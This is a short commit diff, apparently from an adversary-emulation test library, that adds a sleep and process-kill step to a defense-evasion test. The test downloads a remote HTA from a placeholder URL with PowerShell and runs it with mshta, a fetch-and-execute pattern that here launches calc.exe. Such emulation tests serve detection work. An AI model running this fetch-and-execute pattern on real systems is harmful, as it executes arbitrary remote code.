Generated docs from job=generate-docs branch=master [ci skip]
This commit is contained in:
@@ -14998,6 +14998,8 @@ defense-evasion:
|
||||
$var =Invoke-WebRequest "#{hta_url}"
|
||||
$var.content|out-file "#{temp_file}"
|
||||
mshta "#{temp_file}"
|
||||
start-sleep -s 15
|
||||
stop-process -name "calculator" -Force
|
||||
cleanup_command: 'remove-item "#{temp_file}" -ErrorAction Ignore
|
||||
|
||||
'
|
||||
|
||||
@@ -124,6 +124,8 @@ Execute an arbitrary remote HTA. Upon execution calc.exe will be launched.
|
||||
$var =Invoke-WebRequest "#{hta_url}"
|
||||
$var.content|out-file "#{temp_file}"
|
||||
mshta "#{temp_file}"
|
||||
start-sleep -s 15
|
||||
stop-process -name "calculator" -Force
|
||||
```
|
||||
|
||||
#### Cleanup Commands:
|
||||
|
||||
Reference in New Issue
Block a user